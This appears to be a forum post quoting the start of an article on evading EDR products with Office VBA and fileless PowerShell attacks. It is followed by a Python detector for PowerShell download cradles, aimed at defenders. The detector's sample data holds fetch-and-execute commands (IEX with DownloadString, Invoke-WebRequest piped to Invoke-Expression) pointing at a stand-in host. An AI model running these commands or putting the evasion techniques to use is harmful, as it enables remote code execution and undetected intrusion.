Defeating EDRs with Office Products

Andy Ful

Dec 23, 2014
Defeating EDRs with Office Products, by Matthew Eidelberg

This thread is also related to another MT thread:

Defeating EDRs with Office Products

Removing an EDR's hooks from a process is not a foreign concept these days; it’s become a common technique deployed by adversaries to remain undetected while circumventing anti-malware controls. Defenders have tried to combat these attacks but ultimately fall short as most of the effort rests on ensuring that malicious executables can’t run on endpoints (typically through whitelisting or other access control lists). This technique, combined with intensive logging, is often deployed to detect these attacks, preventing any further actions, and stopping the attack chain.

Unfortunately, adversaries are constantly adapting to defensive controls by inventing novel approaches to perform these techniques. As EDR products started augmenting their detection controls with Event Tracing for Windows (ETW), adversaries started tampering with these functions to prevent ETW events from being generated. When it comes to circumventing access controls, adversaries often rely on trusted applications or fileless attacks. These types of attacks are harder to stop or detect because they use legitimate applications to execute malicious actions.

This article will cover topics like the effectiveness of fileless attacks, including their use cases. We’ll also discuss Ivy, a new payload creation framework that utilizes Microsoft's Office VBA environment to programmatically unhook EDRs from processes. The framework then loads, decrypts and executes shellcode while remaining undetected by standard signature-based rules for Visual Basic for Applications (VBA) macro attacks. Ivy techniques are all fileless-based attacks that rely on VBA code (like typical Office macro payloads); however, these are not hampered by the deployment of the security control "Disable Macro Functions" built into Office products. Throughout this article, we’ll discuss the inner workings of the techniques in detail, as well as what defenders can do to help detect these types of attacks inside their networks.

Fileless Malware

When we talk about fileless malware, which has come and gone over the years, there is often a misunderstanding of what that means. Fileless malware techniques often utilize legitimate processes to load code or scripting functions to perform malicious activities such as executing shellcode inside the context of said legitimate process's memory. As a result, there are next to zero artifacts to detect and investigate. Modern sophisticated adversaries use these types of attacks not only to circumvent any anti-malware controls such as EDRs, but also to evade access controls like whitelisting mechanisms.

The most notable example of fileless malware is the PowerShell scripting attack. For a long period of time, this was used by adversaries as a way of executing malicious code on an endpoint without detection or leaving artifacts on disk. This is mainly a result of PowerShell’s ability to import PowerShell scripts into memory from a remote location, such as a website hosting the script (e.g., an HTTP request). Once loaded, the module is called and the script will run, executing malicious code in the context of that PowerShell process’s memory.


Figure 1: PowerShell Fileless Scripted Delivery Walkthrough


The full article:
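As an added example (not part of this post or of the quoted article): the "script pulled from a remote location and run in memory" pattern described above leaves no file on disk, but PowerShell Script Block Logging (Event ID 4104) still records the script text. The small Python detector below runs over constructed 4104 ScriptBlockText samples and flags a block only when it shows both a remote-fetch indicator and an in-memory execution indicator, which keeps ordinary web requests from firing alone. Sample lines, rule names and the `example.invalid` host are my own assumptions.

```python
import re
from dataclasses import dataclass, field

# Constructed ScriptBlockText values, as they would appear in Event ID 4104 (not real logs).
SAMPLE_SCRIPT_BLOCKS = [
    "Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object",
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')",
    "Invoke-WebRequest -Uri http://example.invalid/m.ps1 -UseBasicParsing | Invoke-Expression",
    "Import-Module ActiveDirectory; Get-ADUser -Filter *",
    "Invoke-RestMethod http://example.invalid/api/status",  # fetch with no in-memory execution
]

# Indicators that script content is being fetched from a remote location.
DOWNLOAD_RULES = [
    ("webclient", re.compile(r"Net\.WebClient", re.I)),
    ("downloadstring", re.compile(r"DownloadStr(?:ing|eam)", re.I)),
    ("webrequest", re.compile(r"Invoke-WebRequest|Invoke-RestMethod|\b(?:iwr|irm)\b", re.I)),
    ("url", re.compile(r"https?://", re.I)),
]

# Indicators that fetched text is evaluated as code in the current process.
EXEC_RULES = [
    ("iex", re.compile(r"Invoke-Expression|\biex\b", re.I)),
]


@dataclass
class Finding:
    index: int                      # position of the block in the input list
    reasons: list = field(default_factory=list)  # rule names that matched


def matched_rules(rules, text):
    """Return the names of every rule in `rules` that matches `text`."""
    return [name for name, pattern in rules if pattern.search(text)]


def find_download_cradles(script_blocks):
    """Flag blocks that both fetch remote content and execute it in memory.

    Requiring one hit from each rule set avoids alerting on a plain
    Invoke-WebRequest or on a lone Invoke-Expression of local input.
    """
    findings = []
    for index, text in enumerate(script_blocks):
        download_hits = matched_rules(DOWNLOAD_RULES, text)
        exec_hits = matched_rules(EXEC_RULES, text)
        if download_hits and exec_hits:
            findings.append(Finding(index, download_hits + exec_hits))
    return findings


if __name__ == "__main__":
    for f in find_download_cradles(SAMPLE_SCRIPT_BLOCKS):
        print(f"block {f.index}: {', '.join(f.reasons)}")
```

In production the input would come from the PowerShell/Operational event log rather than a list, and a second stage would correlate the hit with the parent process (an Office application spawning PowerShell is the case the article is about).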